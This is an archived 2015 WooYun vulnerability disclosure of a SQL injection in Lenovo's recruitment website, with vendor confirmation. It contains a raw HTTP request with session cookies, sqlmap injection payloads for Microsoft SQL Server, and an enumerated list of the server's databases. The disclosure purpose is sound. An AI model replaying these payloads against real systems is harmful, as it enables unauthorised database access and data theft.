乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-20: 细节已通知厂商并且等待厂商处理中 2015-04-21: 厂商已经确认,细节仅向厂商公开 2015-05-01: 细节向核心白帽子及相关领域专家公开 2015-05-11: 细节向普通白帽子公开 2015-05-21: 细节向实习白帽子公开 2015-06-05: 细节向公众公开
http://dlx.lenovo.com/dlx3/rcmweb/default.aspx
大联想网上招募存在json格式的SQL注入:
POST /DLX3/RCMWeb/ajaxpro/RCMClass.RCMInfo,RCMClass.ashx HTTP/1.1Host: dlx.lenovo.comProxy-Connection: keep-aliveContent-Length: 12X-AjaxPro-Method: CityListOrigin: http://dlx.lenovo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36Content-Type: text/plain; charset=UTF-8Accept: */*Referer: http://dlx.lenovo.com/dlx3/rcmweb/default.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_fid=574937BDE86E383B-342241E2055EDD74; s_nr=1429350416815; __utma=164043554.1237115562.1429351022.1429351022.1429351022.1; __utmc=164043554; __utmz=164043554.1429351022.1.1.utmcsr=club.lenovo.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/lefen/gift/pub/index.php; ASP.NET_SessionId=atktysbmnxcdwajddifzsk55; ASPSESSIONIDSQSCTRBC=BNJDLFIAAPCIMJKAFHHOOMOM; __CSRFCOOKIE=013e1a69-4059-4b7b-b23d-722632fe5e2b{"pid":"11"}
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:---Place: (custom) POSTParameter: JSON #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"pid":"11' AND 6245=6245 AND 'lZGd'='lZGd"} Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: {"pid":"11' AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8457=8457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(119)+CHAR(115)+CHAR(113))) AND 'Tzxa'='Tzxa"} Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: {"pid":"11' UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(110)+CHAR(120)+CHAR(69)+CHAR(76)+CHAR(81)+CHAR(115)+CHAR(66)+CHAR(114)+CHAR(116)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "} Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: {"pid":"11'; WAITFOR DELAY '0:0:5'--"} Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: {"pid":"11' WAITFOR DELAY '0:0:5'--"}---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: JSON #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: {"pid":"11' AND 6245=6245 AND 'lZGd'='lZGd"} Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: {"pid":"11' AND 8457=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8457=8457) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(119)+CHAR(115)+CHAR(113))) AND 'Tzxa'='Tzxa"} Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: {"pid":"11' UNION ALL SELECT NULL,CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(110)+CHAR(120)+CHAR(69)+CHAR(76)+CHAR(81)+CHAR(115)+CHAR(66)+CHAR(114)+CHAR(116)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "} Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: {"pid":"11'; WAITFOR DELAY '0:0:5'--"} Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: {"pid":"11' WAITFOR DELAY '0:0:5'--"}---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005available databases [20]:[*] CSOExam[*] CSOExam_bak[*] customerinfo[*] DBA[*] gislenovo[*] gislenovo_bak[*] Learning7[*] master[*] model[*] msdb[*] sms[*] sms_bak[*] SSF[*] sunny[*] Supervisor[*] symbiosisMeeting[*] tempdb[*] Test2_xfdlx[*] xfdlx[*] xfdlx_bak
xfdlk库里面居然有1000多张表:
好吧,就这样了~
危害等级:高
漏洞Rank:13
确认时间:2015-04-21 14:41
感谢您对联想信息安全工作的关注与支持!联想于2015年4月3日启用安全应急响应中心(LSRC),欢迎大家向我们反馈联想产品、服务和业务系统的安全漏洞,以帮助我们提升产品和业务的安全性。相关细则请登录安全应急响应中心站点(http:// )1. 4月联想组织双倍积分回馈活动!2. 4月杰出贡献奖,Ipad Air2一台!
暂无